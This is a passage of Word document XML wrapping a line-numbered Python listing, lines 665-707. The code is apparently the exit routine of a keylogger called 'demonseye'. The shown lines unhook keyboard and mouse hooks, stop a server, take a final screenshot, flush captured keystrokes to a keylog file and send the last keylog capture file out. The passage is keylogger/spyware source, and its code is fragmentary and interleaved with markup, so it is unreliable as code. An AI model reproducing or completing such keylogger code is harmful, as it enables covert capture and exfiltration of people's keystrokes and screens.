    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1012" w:name="l665"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">665  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1012"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1013" w:name="l666"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">666  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1013"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Actions to do before Exit program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1014" w:name="l667"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">667  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1014"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>exit_demonsey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15" w:name="l668"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">668  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1015"/>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1016" w:name="l669"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">669  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="101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Entering exit_demonseye'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1017" w:name="l670"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">670  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1017"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1018" w:name="l671"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">671  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1018"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>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019" w:name="l672"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">672  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1019"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Unhooking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1020" w:name="l673"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">673  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1020"/>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Keyboard</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1021" w:name="l674"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">674  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1021"/>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Mouse</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1022" w:name="l675"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">675  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1022"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>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input</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1023" w:name="l676"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">676  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1023"/>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24" w:name="l677"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">677  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1024"/>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25" w:name="l678"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">678  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1025"/>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26" w:name="l679"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">679  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1026"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1027" w:name="l680"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">680  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1027"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Stopping server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1028" w:name="l681"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">681  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1028"/>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1029" w:name="l682"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">682  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1029"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1030" w:name="l683"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">683  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1030"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">''' </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1031" w:name="l684"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">684  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1031"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    In principle, it is not necessary to force a kill for clients,  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1032" w:name="l685"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">685  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1032"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    but the function is provided if necessary in the future. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1033" w:name="l686"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">686  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1033"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    '''</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1034" w:name="l687"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">687  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1034"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># kill_server_clients()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1035" w:name="l688"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">688  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1035"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1036" w:name="l689"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">689  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1036"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Do a last screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1037" w:name="l690"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">690  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1037"/>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1038" w:name="l691"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">691  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1038"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1039" w:name="l692"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">692  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1039"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Saves to keylog file the Closing Event, Date and Time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1040" w:name="l693"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">693  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="104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1" w:name="l694"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">694  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="104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LOSING PROGRA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2" w:name="l695"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">695  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="104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43" w:name="l696"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">696  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1043"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1044" w:name="l697"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">697  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1044"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Empty the key buffer to disk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1045" w:name="l698"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">698  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1045"/>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1046" w:name="l699"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">699  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1046"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1047" w:name="l700"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">700  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1047"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Send de last keylog capture file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1048" w:name="l701"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">701  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1048"/>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1049" w:name="l702"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">702  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1049"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1050" w:name="l703"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">703  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1050"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Wait to all threads are finished</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1051" w:name="l704"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">704  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1051"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">thr </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>threadList</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1052" w:name="l705"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">705  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1052"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>th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053" w:name="l706"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">706  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1053"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1054" w:name="l707"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">707  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1054"/>
